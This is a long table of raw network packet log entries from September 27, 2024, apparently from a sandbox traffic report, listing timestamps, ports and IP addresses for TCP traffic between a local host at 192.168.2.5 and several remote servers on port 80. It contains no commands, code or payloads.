                                                                          Sep 27, 2024 04:21:17.272753000 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272762060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272764921 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272793055 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272830963 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272840977 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272850990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272861958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272864103 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272875071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272887945 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272912025 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273432016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273472071 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273477077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273488045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273510933 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273528099 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273545980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273555994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273566008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273576021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273581028 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273598909 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273622990 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273653984 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273664951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273674011 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273684978 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273694992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273694992 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273714066 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273725033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273737907 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273746014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273761988 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273766994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.273788929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.273803949 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.277513027 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.277523994 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.277534008 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.277554989 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.277565002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.277575970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.277580976 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.277589083 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.277599096 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.277630091 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.277647972 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.494772911 CEST4971945580192.168.2.565.21.18.51
                                                                          Sep 27, 2024 04:21:17.498924971 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.498941898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.498953104 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.498980999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.498991966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499001980 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499002934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499017000 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499030113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499052048 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499082088 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499176979 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499187946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499200106 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499238014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499239922 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499249935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499259949 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499262094 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499274015 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499285936 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499296904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499301910 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499309063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499351978 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499526978 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499543905 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499555111 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499566078 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499572039 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499579906 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499591112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499602079 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499608994 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499613047 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499625921 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499638081 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499650002 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499650955 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499661922 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499672890 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499684095 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499682903 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.499696970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499701977 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.499718904 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499720097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.499749899 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.499789000 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.499954939 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499965906 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499977112 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499986887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.499999046 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500009060 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500015974 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500020981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500031948 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500042915 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500053883 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500056028 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500082016 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500082970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500097036 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500107050 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500108957 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500121117 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500133038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500142097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500144005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500155926 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500166893 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500178099 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500180006 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500190973 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500206947 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500214100 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500219107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500227928 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500232935 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500248909 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500257015 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500261068 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500277042 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500288010 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500293016 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500300884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500312090 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500322104 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500332117 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500334978 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500348091 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500355959 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500360012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500372887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.500381947 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500401020 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500435114 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.500984907 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501002073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501013994 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501024008 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501034021 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501044035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501045942 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501056910 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501068115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501079082 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501089096 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501097918 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501097918 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501111031 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501123905 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501128912 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501141071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501152992 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501161098 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501163960 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501174927 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501184940 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501189947 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501199007 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501210928 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501221895 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501231909 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501233101 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501243114 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501255035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501262903 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501265049 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501276970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501286983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501291037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501303911 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501310110 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501313925 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501327038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501331091 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501337051 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501351118 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501362085 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501374006 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501374006 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501384020 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501394987 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501405954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501415014 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501436949 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501470089 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501765013 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501777887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501787901 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501827002 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501868963 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501897097 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501909018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501919985 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501930952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501943111 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501952887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501955032 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.501965046 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501976013 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501986980 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.501996994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502007008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502010107 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.502024889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502037048 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502039909 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.502043009 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.502051115 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502062082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502070904 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.502074957 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502093077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502094030 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.502105951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502116919 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502120018 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.502129078 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502140999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502151012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502156973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.502162933 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502173901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502182961 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502192974 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502202988 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.502203941 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502216101 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502227068 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502234936 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.502239943 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502247095 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.502253056 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502263069 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.502280951 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.502300978 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.502871037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502882004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502892017 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502903938 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502914906 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502919912 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.502927065 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502938032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502943993 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502949953 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502955914 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.502962112 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502974033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502983093 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.502985001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.502998114 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503014088 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503019094 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.503026009 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503037930 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503047943 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503056049 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503056049 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.503060102 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503074884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503086090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503097057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503106117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503106117 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.503115892 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503127098 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503137112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503148079 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503155947 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.503158092 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503159046 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503170967 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503181934 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503184080 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503195047 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503196001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503209114 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503218889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503220081 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503230095 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503241062 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503241062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503252983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503262997 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503273010 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503278017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503304005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503320932 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503761053 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503772974 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503838062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503849030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503859043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503863096 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503870964 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503880978 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503891945 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503892899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503905058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503914118 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503925085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503925085 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503937006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503950119 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503952026 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503961086 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503973961 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503983021 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.503983974 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.503995895 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.504007101 CEST8049725185.215.113.117192.168.2.5
